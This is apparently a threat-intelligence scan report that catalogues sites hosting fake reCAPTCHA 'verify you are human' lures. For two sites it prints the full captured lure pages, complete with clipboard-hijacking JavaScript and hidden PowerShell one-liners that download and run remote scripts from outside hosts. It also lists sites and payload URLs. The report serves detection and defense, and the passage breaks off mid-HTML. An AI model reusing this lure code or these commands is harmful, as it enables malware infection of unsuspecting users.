ClickGrab Report: 2025-04-24
Report Summary
Sites Scanned
31
Attacks Detected
138
New Attack Patterns
0
Affected Sites
| Site Domain | Attack Type | Detected Patterns | First Seen |
|---|---|---|---|
| riverview-pools.com | PowerShell Execution | 5 | 2025-04-24 |
| blessdayservices.org | PowerShell Execution | 5 | 2025-04-24 |
| jessespridecharters.com | PowerShell Execution | 5 | 2025-04-24 |
| mail.lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-24 |
| mail.finocci.com | PowerShell Execution | 1 | 2025-04-24 |
| cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-24 |
| admin.gestroom.it | PowerShell Execution | 1 | 2025-04-24 |
| test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-24 |
| first-security-verden.de | PowerShell Execution | 5 | 2025-04-24 |
| lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-24 |
| www.first-security-verden.de | PowerShell Execution | 5 | 2025-04-24 |
| www.laborpartyjo.com | PowerShell Execution | 3 | 2025-04-24 |
| finocci.com | PowerShell Execution | 1 | 2025-04-24 |
| www.finocci.com | PowerShell Execution | 1 | 2025-04-24 |
| www.website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-24 |
| www.lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-24 |
| thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-24 |
| www.bratusferramentas.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-24 |
| ningbocrm.jintsume.net | PowerShell Execution | 8 | 2025-04-24 |
| horno-rafelet.es | PowerShell Execution | 3 | 2025-04-24 |
| bmdcompany.com | PowerShell Execution | 1 | 2025-04-24 |
| www.zamilgroups.com | PowerShell Execution | 1 | 2025-04-24 |
| lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-24 |
| laborpartyjo.com | PowerShell Execution | 3 | 2025-04-24 |
| www.thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-24 |
| www.test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-24 |
| mail.cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-24 |
| my.salviatech.com | PowerShell Execution | 3 | 2025-04-24 |
| 82.146.62.232 | PowerShell Execution | 3 | 2025-04-24 |
| 101.32.40.22 | PowerShell Execution | 4 | 2025-04-24 |
| staplebrokenmetaliyro.blogspot.com | PowerShell Execution | 46 | 2025-04-24 |
Detailed URL Analysis
https://riverview-pools.com/verify/index.html
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell " + htaPath; iex (irm 'https://aatox.com/verify/45.ps1')
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://riverview-pools.com/verify/index.html",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://aatox.com/verify/45.ps1"
],
"PowerShellCommands": [
"powershell \" + htaPath;\r",
"iex (irm 'https://aatox.com/verify/45.ps1')"
],
"ClipboardCommands": "powershell ",
"SuspiciousKeywords": [
"Command ",
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "'https://aatox.com/verify/45.ps1'",
"URL": "https://aatox.com/verify/45.ps1",
"Context": "...nst htaPath = \"-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1')\\\"\"; const commandToRun = \"powershell \" + htaP..."
},
"CaptchaElements": [
"ication Hash: <span id=\"verification-id\">1110</span>\"",
"=\"modal\"> <div class=\"modal-content\"> <p>Please",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"nt)) { document.getElementById(\"mobileWarningModal\").style.display = \"b",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"ber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"</div> <script> document.addEv",
"}); </script> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n\r\n<html lang=\"en\">\r\n <head>\r\n <meta charset=\"utf-8\">\r\n <title>reCAPTCHA Verification</title>\r\n\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n\r\n.modal {\r\n display: none; /* Hidden by default */\r\n position: fixed;\r\n z-index: 9999; /* Ensure the modal is on top */\r\n left: 0;\r\n top: 0;\r\n width: 100%;\r\n height: 100%;\r\n background-color: rgba(0, 0, 0, 0.7); /* Dim the background */\r\n}\r\n\r\n.modal-content {\r\n position: absolute;\r\n top: 50%;\r\n left: 50%;\r\n transform: translate(-50%, -50%);\r\n background-color: white;\r\n padding: 20px;\r\n border-radius: 5px;\r\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\r\n text-align: center;\r\n font-family: Arial, sans-serif;\r\n}\r\n\r\n .container {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n }\r\n\r\n .m-p {\r\n margin: 0;\r\n padding: 0;\r\n }\r\n\r\n .block {\r\n display: block;\r\n }\r\n\r\n code {\r\n font-size: 9px;\r\n margin-left: 2px;\r\n color: gray;\r\n }\r\n\r\n .line-normal {\r\n line-height: normal;\r\n }\r\n\r\n .checkbox-window {\r\n position: fixed; /* Center it within the viewport */\r\n top: 50%;\r\n left: 50%;\r\n transform: translate(-50%, -50%);\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n z-index: 1000;\r\n}\r\n\r\n .checkbox-window a {\r\n color: #555;\r\n text-decoration: none;\r\n }\r\n\r\n .checkbox-window a:hover {\r\n color: #555;\r\n text-decoration: underline;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n }\r\n\r\n .checkbox {\r\n position: relative;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n height: 100%;\r\n width: 100%;\r\n border: 2px solid #c1c1c1;\r\n margin: 21px 0 0 12px;\r\n outline: none;\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\r\n }\r\n\r\n .checkbox:hover {\r\n border: 2px solid #b2b2b2;\r\n }\r\n\r\n .im-not-a-robot {\r\n position: relative;\r\n left: 52px;\r\n bottom: 3px;\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n position: relative;\r\n\r\n left: 244px;\r\n bottom: 36px;\r\n width: 40px;\r\n height: 45px;\r\n vertical-align: baseline;\r\n padding-bottom: 4px;\r\n }\r\n\r\n\r\n .checkbox-desc {\r\n color: #555555;\r\n position: relative;\r\n font-size: 8px;\r\n text-align: center;\r\n bottom: 40px;\r\n left: 112px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: relative;\r\n top: -85px;\r\n left: 12px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n visibility: hidden;\r\n opacity: 0;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n .verify-window {\r\n position: fixed; /* Center it within the viewport */\r\n top: 50%;\r\n left: 50%;\r\n transform: translate(-50%, -50%);\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n opacity: 0; /* Initially hidden */\r\n visibility: hidden;\r\n z-index: 1001;\r\n}\r\n\r\n ol {\r\n counter-reset: item;\r\n list-style-type: none;\r\n list-style-position: outside; \r\n padding-left: 0;\r\n\r\n }\r\n\r\n ol li {\r\n counter-increment: item;\r\n margin-bottom: 10px;\r\n\r\n }\r\n\r\n ol li::before {\r\n content: counter(item) \". \";\r\n color: #1A73E8;\r\n font-weight: bold;\r\n margin-right: 10px;\r\n margin-left: 10px;\r\n }\r\n\r\n .verify-container {\r\n padding: 8px;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px 16px 24px 16px;\r\n color: #fff;\r\n }\r\n\r\n .verify-header-text-small {\r\n font-size: 14px;\r\n line-height: normal;\r\n }\r\n\r\n .verify-header-text-medium {\r\n font-size: 16px;\r\n }\r\n\r\n .verify-header-text-big {\r\n font-size: 24px;\r\n font-weight: 700;\r\n }\r\n\r\n .verify-main {\r\n padding: 5px;\r\n color: #111;\r\n font-size: 13px;\r\n\r\n }\r\n\r\n .verify-footer {\r\n border-top: 1px solid #cecece;\r\n padding: 10px 7px 10px 7px;\r\n color: #737373;\r\n display: grid;\r\n grid-template-columns: auto 102px;\r\n font-size: 13px;\r\n }\r\n\r\n .verify-footer-left {\r\n padding: 5px;\r\n }\r\n\r\n .verify-verify-button {\r\n text-transform: uppercase;\r\n background-color: #5a89e2;\r\n color: #fff;\r\n text-align: center;\r\n width: 100%;\r\n padding: 12px 0 12px 0;\r\n text-decoration: none;\r\n font-weight: 600;\r\n height: min-content;\r\n border-radius: 3px;\r\n font-size: 14px;\r\n border: none;\r\n outline: none;\r\n cursor: not-allowed;\r\n }\r\n </style>\r\n </head>\r\n <body>\r\n<div id=\"mobileWarningModal\" class=\"modal\">\r\n <div class=\"modal-content\">\r\n <p>Please visit this site on a computer for the best experience.</p>\r\n </div>\r\n</div>\r\n\r\n <div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot | Captcha Verification Hash: <span id=\"verification-id\">1110</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n<script>\r\n document.addEventListener(\"DOMContentLoaded\", function () {\r\n if (/Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent)) {\r\n document.getElementById(\"mobileWarningModal\").style.display = \"block\";\r\n document.body.style.overflow = \"hidden\"; // Prevent scrolling\r\n }\r\n });\r\n</script>\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"21px 0 0 12px\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot | Captcha Verification Hash: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun + suffix + ploy + verification_id + end\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\n function showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth-10 ) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n \r\n const htaPath = \"-NoP -WindowStyle Hidden -Command \\\"iex (irm 'https://aatox.com/verify/45.ps1')\\\"\";\r\n const commandToRun = \"powershell \" + htaPath;\r\n stageClipboard(commandToRun, verification_id);\r\n\r\n }\r\n\r\n addCaptchaListeners();\r\n\r\n </script>\r\n </body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://blessdayservices.org/up/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\""; powershell " + htaPath;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://blessdayservices.org/up/",
"URLs": [
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png",
"https://www.google.com/intl/en/policies/privacy/",
"https://www.google.com/intl/en/policies/terms/",
"https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1"
],
"PowerShellCommands": [
"powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\";",
"powershell \" + htaPath;"
],
"ClipboardCommands": "powershell ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification Hash",
"reCAPTCHA Verification",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...dy.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextAr..."
],
"PowerShellDownloads": [
{
"FullMatch": "iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex",
"URL": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"Context": "...n -c \\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToRun = \"..."
},
{
"FullMatch": "| iex",
"URL": null,
"Context": "...https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToRun = \"..."
},
{
"FullMatch": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"URL": "https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1",
"Context": "...\\\"Start-Process powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\\\"\"; const commandToR..."
}
],
"CaptchaElements": [
"ication Hash: <span id=\"verification-id\">1110</span>\"",
"s=\"modal\"> <div class=\"modal-content\"> <p>Please",
"} function hideCaptchaLoading() { chec",
"} function hideCaptchaCheckbox() { chec",
"ent)) { document.getElementById(\"mobileWarningModal\").style.display = \"b",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let check",
"let checkboxBtn = document.getElementById(\"checkbox\"); let check",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let verif",
"let verifywindow = document.getElementById(\"verify-window\"); function",
"mber(); document.getElementById('verification-id').textContent = veri",
"lect(); document.execCommand(\"copy\"); docu",
"tempTextArea.select(); docume",
"</div> <script> document.addEve",
"}); </script> <script> let checkbo"
],
"HTML": "<!DOCTYPE html>\n\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>reCAPTCHA Verification</title>\n\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \n <style>\n\n.modal {\n display: none; /* Hidden by default */\n position: fixed;\n z-index: 9999; /* Ensure the modal is on top */\n left: 0;\n top: 0;\n width: 100%;\n height: 100%;\n background-color: rgba(0, 0, 0, 0.7); /* Dim the background */\n}\n\n.modal-content {\n position: absolute;\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n background-color: white;\n padding: 20px;\n border-radius: 5px;\n box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);\n text-align: center;\n font-family: Arial, sans-serif;\n}\n\n .container {\n font-family: Roboto, helvetica, arial, sans-serif;\n }\n\n .m-p {\n margin: 0;\n padding: 0;\n }\n\n .block {\n display: block;\n }\n\n code {\n font-size: 9px;\n margin-left: 2px;\n color: gray;\n }\n\n .line-normal {\n line-height: normal;\n }\n\n .checkbox-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n height: 74px;\n width: 300px;\n background-color: #f9f9f9;\n border-radius: 3px;\n border: 1px solid #d3d3d3;\n z-index: 1000;\n}\n\n .checkbox-window a {\n color: #555;\n text-decoration: none;\n }\n\n .checkbox-window a:hover {\n color: #555;\n text-decoration: underline;\n }\n\n .checkbox-container {\n width: 28px;\n height: 28px;\n }\n\n .checkbox {\n position: relative;\n background-color: #fff;\n border-radius: 2px;\n height: 100%;\n width: 100%;\n border: 2px solid #c1c1c1;\n margin: 21px 0 0 12px;\n outline: none;\n font-family: Roboto, helvetica, arial, sans-serif;\n transition: width 500ms, height 500ms, border-radius 500ms, margin-top 500ms, margin-left 500ms, opacity 700ms;\n }\n\n .checkbox:hover {\n border: 2px solid #b2b2b2;\n }\n\n .im-not-a-robot {\n position: relative;\n left: 52px;\n bottom: 3px;\n font-size: 15px;\n color: #282727;\n }\n\n .captcha-logo {\n position: relative;\n\n left: 244px;\n bottom: 36px;\n width: 40px;\n height: 45px;\n vertical-align: baseline;\n padding-bottom: 4px;\n }\n\n\n .checkbox-desc {\n color: #555555;\n position: relative;\n font-size: 8px;\n text-align: center;\n bottom: 40px;\n left: 112px;\n }\n\n .spinner {\n visibility: hidden;\n position: relative;\n top: -85px;\n left: 12px;\n height: 20px;\n width: 20px;\n border: 2px solid rgba(0, 0, 0, 0.1);\n border-top: 2px solid #333;\n border-radius: 50%;\n visibility: hidden;\n opacity: 0;\n transition: opacity 0.5s linear;\n animation: spin 1s linear infinite;\n }\n\n @keyframes spin {\n 0% {\n transform: rotate(0deg);\n }\n\n 100% {\n transform: rotate(360deg);\n }\n }\n\n .verify-window {\n position: fixed; /* Center it within the viewport */\n top: 50%;\n left: 50%;\n transform: translate(-50%, -50%);\n width: 310px;\n background-color: #fff;\n border: 1px solid #cecece;\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\n transition: opacity 400ms;\n opacity: 0; /* Initially hidden */\n visibility: hidden;\n z-index: 1001;\n}\n\n ol {\n counter-reset: item;\n list-style-type: none;\n list-style-position: outside; \n padding-left: 0;\n\n }\n\n ol li {\n counter-increment: item;\n margin-bottom: 10px;\n\n }\n\n ol li::before {\n content: counter(item) \". \";\n color: #1A73E8;\n font-weight: bold;\n margin-right: 10px;\n margin-left: 10px;\n }\n\n .verify-container {\n padding: 8px;\n }\n\n .verify-header {\n background-color: #1A73E8;\n padding: 16px 16px 24px 16px;\n color: #fff;\n }\n\n .verify-header-text-small {\n font-size: 14px;\n line-height: normal;\n }\n\n .verify-header-text-medium {\n font-size: 16px;\n }\n\n .verify-header-text-big {\n font-size: 24px;\n font-weight: 700;\n }\n\n .verify-main {\n padding: 5px;\n color: #111;\n font-size: 13px;\n\n }\n\n .verify-footer {\n border-top: 1px solid #cecece;\n padding: 10px 7px 10px 7px;\n color: #737373;\n display: grid;\n grid-template-columns: auto 102px;\n font-size: 13px;\n }\n\n .verify-footer-left {\n padding: 5px;\n }\n\n .verify-verify-button {\n text-transform: uppercase;\n background-color: #5a89e2;\n color: #fff;\n text-align: center;\n width: 100%;\n padding: 12px 0 12px 0;\n text-decoration: none;\n font-weight: 600;\n height: min-content;\n border-radius: 3px;\n font-size: 14px;\n border: none;\n outline: none;\n cursor: not-allowed;\n }\n </style>\n </head>\n <body>\n<div id=\"mobileWarningModal\" class=\"modal\">\n <div class=\"modal-content\">\n <p>Please visit this site on a computer for the best experience.</p>\n </div>\n</div>\n\n <div class=\"container m-p\"> \n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\n <div class=\"checkbox-container m-p\">\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\n </div>\n <p class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\n <br>\n <p class=\"checkbox-desc m-p line-normal\">\n <a href=\"https://www.google.com/intl/en/policies/privacy/\">Privacy</a> - <a href=\"https://www.google.com/intl/en/policies/terms/\">Terms</a>\n </p>\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\n </div>\n \n <div id=\"verify-window\" class=\"verify-window\">\n <div class=\"verify-container\">\n <header class=\"verify-header\">\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\n <span class=\"verify-header-text-medium m-p block\"></span>\n </header>\n <main class=\"verify-main\">\n <p>\n To better prove you are not a robot, please:\n </p>\n <ol>\n <li>\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\n </li>\n \n <li>\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\n </li>\n\n <li>\n Press <b>Enter</b> on your keyboard to finish.\n </li>\n </ol>\n <p>\n You will observe and agree:\n <br>\n <code>\n \u2705 \"I am not a robot - reCAPTCHA Verification Hash: <span id=\"verification-id\">1110</span>\"\n </code>\n </p>\n\n \n </main>\n </div>\n <footer class=\"verify-container verify-footer\">\n <div class=\"verify-footer-left\">\n Perform the steps above to finish verification.\n </div>\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\n </footer>\n </div> \n </div>\n<script>\n document.addEventListener(\"DOMContentLoaded\", function () {\n if (/Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent)) {\n document.getElementById(\"mobileWarningModal\").style.display = \"block\";\n document.body.style.overflow = \"hidden\"; // Prevent scrolling\n }\n });\n</script>\n <script>\n let checkboxWindow = document.getElementById(\"checkbox-window\");\n let checkboxBtn = document.getElementById(\"checkbox\");\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\n let verifywindow = document.getElementById(\"verify-window\");\n\n function addCaptchaListeners() {\n if (checkboxBtn) {\n document.addEventListener(\"click\", function (event) {\n let path = event.composedPath();\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\n closeverifywindow();\n }\n });\n checkboxBtn.addEventListener(\"click\", function (event) {\n event.preventDefault();\n checkboxBtn.disabled = true;\n runClickedCheckboxEffects();\n });\n }\n }\n\n function runClickedCheckboxEffects() {\n hideCaptchaCheckbox();\n setTimeout(function(){\n showCaptchaLoading();\n },500);\n setTimeout(function(){\n showVerifyWindow();\n },900)\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.opacity = \"0\";\n checkboxBtnSpinner.style.animation = \"none\";\n setTimeout(function() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n }, 500);\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.visibility = \"hidden\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n\n function showCaptchaCheckbox() {\n checkboxBtn.style.width = \"100%\";\n checkboxBtn.style.height = \"100%\";\n checkboxBtn.style.borderRadius = \"2px\";\n checkboxBtn.style.margin = \"21px 0 0 12px\";\n checkboxBtn.style.opacity = \"1\";\n }\n\n function hideCaptchaCheckbox() {\n checkboxBtn.style.width = \"4px\";\n checkboxBtn.style.height = \"4px\";\n checkboxBtn.style.borderRadius = \"50%\";\n checkboxBtn.style.marginLeft = \"25px\";\n checkboxBtn.style.marginTop = \"33px\";\n checkboxBtn.style.opacity = \"0\";\n }\n\n function showCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"visible\";\n checkboxBtnSpinner.style.opacity = \"1\";\n }\n\n function hideCaptchaLoading() {\n checkboxBtnSpinner.style.visibility = \"hidden\";\n checkboxBtnSpinner.style.opacity = \"0\";\n }\n\n function generateRandomNumber() {\n const min = 1000; \n const max = 9999;\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\n }\n\n function closeverifywindow() {\n verifywindow.style.display = \"none\";\n verifywindow.style.visibility = \"hidden\";\n verifywindow.style.opacity = \"0\";\n\n showCaptchaCheckbox();\n hideCaptchaLoading();\n checkboxBtn.disabled = false;\n }\n\n function isverifywindowVisible() {\n return verifywindow.style.display !== \"none\" && 